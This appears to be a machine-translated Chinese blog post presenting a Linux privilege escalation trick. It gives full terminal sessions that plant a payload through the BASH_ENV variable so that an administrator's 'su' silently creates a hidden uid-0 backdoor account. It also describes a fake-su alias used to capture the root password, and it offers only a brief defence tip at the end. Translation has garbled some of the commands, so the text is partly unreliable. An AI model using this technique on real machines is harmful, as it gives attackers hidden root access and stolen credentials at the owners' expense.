Tips for privilege escalation in Linux

Author: xi4oyu
One test:

[Xiaoyu @ localdomain ~] $ Echo $ bash_env

[Xiaoyu @ localdomain ~] $ Export bash_env = "/tmp/. bashrc"
[Xiaoyu @ localdomain ~] $ Echo $ bash_env
/Tmp/. bashrc

[Xiaoyu @ localdomain ~] $ CAT/tmp/. bashrc
#! /Bin/bash
Echo "hello"

[Xiaoyu @ localdomain ~] $ LS-l
-Rwxrwxr-x 1 Xiaoyu 22 2008-09-11 05:54 test. Sh

[Xiaoyu @ localdomain ~] $ CAT test. Sh
#! /Bin/bash
Echo "KK"

[Xiaoyu @ localdomain ~] $./Test. Sh
Hello
Kk

Well, it's good, just as we expected. Let's see how we use it.

Grep SU ~ /. Bash_history

It shows that this user has a special hobby of using su to log on to the root account. In the past, we often encountered this situation by inserting fakesu. C. Modify. bash_profile to create an alias or something like that. Get the root password through getpass, record, and remove the alias... the key is that the Administrator will prompt a wrong password when logging on with the correct password. If you encounter a silly administrator, you may be able to let go of the details and enter the password again. However, some non-human administrators will check for signs of system intrusion as quickly as possible, and what else does it add? It is almost certain that such administrators change the root password. Therefore, it is useless to steal the password. Well, the smart X customers must know what I want to do. Haha, check the environment variable Su before

[Xiaoyu @ localdomain ~] $ Echo $ bash_env
/Tmp/. bashrc
[Xiaoyu @ localdomain ~] $ Su
Password:
[Root @ localdomain XiaoYu] # echo $ bash_env
/Tmp/. bashrc
Ah, it's still there. OK. The experiment is over. Practice:

[Xiaoyu @ localdomain TMP] $ echo '/usr/sbin/useradd-u 0-o kk 2>/dev/null'>/tmp/. bashrc
[Xiaoyu @ localdomain TMP] $ CAT/tmp/. bashrc
/Usr/sbin/useradd-u 0-o kk 2>/dev/null
[Xiaoyu @ localdomain TMP] $ grep KK/etc/passwd
[Xiaoyu @ localdomain TMP] $ echo $ bash_env
/Tmp/. bashrc
[Xiaoyu @ localdomain TMP] $ su
Password:
[Root @ localdomain TMP] # cd/home/XiaoYu
[Root @ localdomain XiaoYu] #./test. Sh
Kk
[Root @ localdomain XiaoYu] # grep KK/etc/passwd
KK: X: 0: 503:/home/KK:/bin/bash
[Root @ localdomain XiaoYu] #

I didn't add the password change statement. I think, I don't know, I don't know.

Well, like fakesu, how to place the export bash_env variable in. bash_profile and other places...

To avoid this situation, use Su-to log on to the root user. It is estimated that few administrators will remember this command... Khan...

In the future, some tips will be slowly released, and many things will be embedded, so I forgot to... sorry!